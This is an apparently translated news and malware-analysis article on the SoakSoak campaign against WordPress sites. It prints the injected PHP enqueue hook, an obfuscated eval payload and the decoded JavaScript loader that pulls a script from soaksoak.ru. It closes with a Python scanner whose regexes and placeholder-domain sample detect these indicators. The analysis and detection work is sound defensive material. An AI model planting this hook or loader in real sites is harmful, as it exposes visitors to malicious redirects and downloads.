0.1 million WordPress website collapse: the malicious software SoakSoak has arrived

Source: Internet
Author: User

WordPress is a blog platform developed in PHP. You can set up your own blog with it or use WordPress as a content management system (CMS). WordPress security vulnerabilities have occurred frequently in recent months, including free themes with hidden webshells that affect well-known CMS systems such as WordPress, and the XSS vulnerability in WordPress versions earlier than 4.0. Now, a widely spread malware has infected more than 100,000 WordPress websites, and the number is still increasing.

Google blacklists over 11,000 domain names

The news first reached the WordPress community on Sunday morning, when Google blacklisted more than 11,000 domain names. These websites had all been compromised by the latest malware. The malicious script is loaded from SoakSoak.ru, so the malware is named SoakSoak. As more than 0.7 billion websites on the Internet use WordPress, such malware has a huge impact.

Once infected, the website will behave abnormally, including redirecting visitors to SoakSoak.ru. Users accessing the website may also automatically download malicious programs. Google has blacklisted 11,000 websites that may be infected.

Malware Analysis

The SoakSoak malware modifies the wp-includes/template-loader.php file, appending the following hook:

<?php
function FuncQueueObject() {
    wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts", 'FuncQueueObject');

In this way, wp-includes/js/swfobject.js is loaded on every page. That swfobject.js file contains the obfuscated (URL-encoded) malicious JavaScript code:

eval(decodeURIComponent ("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));

Decrypted code (the body that is passed to eval):

(function(){
    //var ua = navigator.userAgent.toLowerCase();
    //if (ua.indexOf('chrome') != -1) return;
    var head=document.getElementsByTagName('head')[0];
    var script=document.createElement('script');
    script.type='text/javascript';
    script.src='http://soaksoak.ru/xteas/code';
    script.id='xxyyzz_petushok';
    head.appendChild(script);
}());

Once decoded, the script injects a <script> tag that loads JavaScript from the SoakSoak.ru domain: hxxp://soaksoak.ru/xteas/code

Detection and Prevention

It is not yet clear how the malware gets onto a website. If you are using WordPress and are worried that your website is infected, Sucuri provides a free website scan that checks whether your site carries the malware.
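As an added example, not from the original article and not Sucuri's scanner, the Python script below checks the two indicators described in the analysis above: the enqueue hook injected into wp-includes/template-loader.php, and the eval(decodeURIComponent("...")) wrapper prepended to wp-includes/js/swfobject.js, whose payload it decodes to extract the remote script URL. Both input files are constructed samples embedded inline; the loader domain in the sample is the placeholder malicious.example, not the real one, and the regular expressions are this example's own assumptions about the injection's shape.

```python
import re
from typing import List
from urllib.parse import quote, unquote

# --- Constructed sample inputs (not real infected files) ---------------------
# The PHP hook mirrors the injection the article shows in
# wp-includes/template-loader.php.
SAMPLE_TEMPLATE_LOADER = """<?php
/* ... normal template-loader.php contents (abridged) ... */
function FuncQueueObject(){
  wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts",'FuncQueueObject');
"""

# A loader of the same shape as the decoded payload above, with a placeholder
# domain (malicious.example) instead of the real one, URL-encoded and wrapped
# in eval(decodeURIComponent(...)) the way the infected swfobject.js is.
PAYLOAD_JS = (
    "(function(){var head=document.getElementsByTagName('head')[0];"
    "var script=document.createElement('script');"
    "script.src='http://malicious.example/xteas/code';"
    "script.id='xxyyzz_petushok';head.appendChild(script);}());"
)
SAMPLE_SWFOBJECT = 'eval(decodeURIComponent("%s"));' % quote(PAYLOAD_JS, safe="")

# A clean swfobject.js starts with the library itself, not an eval() wrapper.
CLEAN_SWFOBJECT = "var swfobject=function(){var UNDEF='undefined';/* ... */}();"

# --- Indicators (assumed shapes, based on the samples in the article) --------
# The injected hook: wp_enqueue_script("swfobject") followed by an add_action
# on wp_enqueue_scripts. Stock template-loader.php contains neither.
INJECTED_HOOK = re.compile(
    r"wp_enqueue_script\(\s*['\"]swfobject['\"]\s*\)"
    r".*?add_action\(\s*['\"]wp_enqueue_scripts['\"]",
    re.S,
)
# eval(decodeURIComponent("...")) with a quoted, percent-encoded string.
EVAL_DECODE = re.compile(
    r"eval\s*\(\s*decodeURIComponent\s*\(\s*['\"]([^'\"]+)['\"]\s*\)\s*\)"
)
SCRIPT_SRC = re.compile(r"script\.src\s*=\s*['\"]([^'\"]+)['\"]")


def check_template_loader(php_src: str) -> bool:
    """True if template-loader.php carries the SoakSoak-style enqueue hook."""
    return INJECTED_HOOK.search(php_src) is not None


def decode_payloads(js_src: str) -> List[str]:
    """Return the decoded body of every eval(decodeURIComponent("...")) call."""
    return [unquote(m.group(1)) for m in EVAL_DECODE.finditer(js_src)]


def extract_script_sources(decoded_js: str) -> List[str]:
    """Collect the URLs a decoded loader assigns to script.src."""
    return SCRIPT_SRC.findall(decoded_js)


def scan(template_loader_src: str, swfobject_src: str) -> List[str]:
    """Run both checks and describe each finding in one line."""
    findings = []
    if check_template_loader(template_loader_src):
        findings.append("template-loader.php: injected swfobject enqueue hook")
    for body in decode_payloads(swfobject_src):
        for url in extract_script_sources(body):
            findings.append(
                "swfobject.js: eval(decodeURIComponent) loader fetching " + url
            )
    return findings


if __name__ == "__main__":
    for line in scan(SAMPLE_TEMPLATE_LOADER, SAMPLE_SWFOBJECT):
        print(line)
    print("clean files:", scan("<?php // stock loader", CLEAN_SWFOBJECT))
```

Indicator matching of this kind only catches the variant described here; the loader's domain and encoding can change between campaigns. A more durable check is to compare wp-includes/template-loader.php and wp-includes/js/swfobject.js (hashes or a diff) against pristine copies of the same WordPress version, and to treat any eval(decodeURIComponent(...)) in a core file as worth investigating rather than as proof of this specific malware.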

 
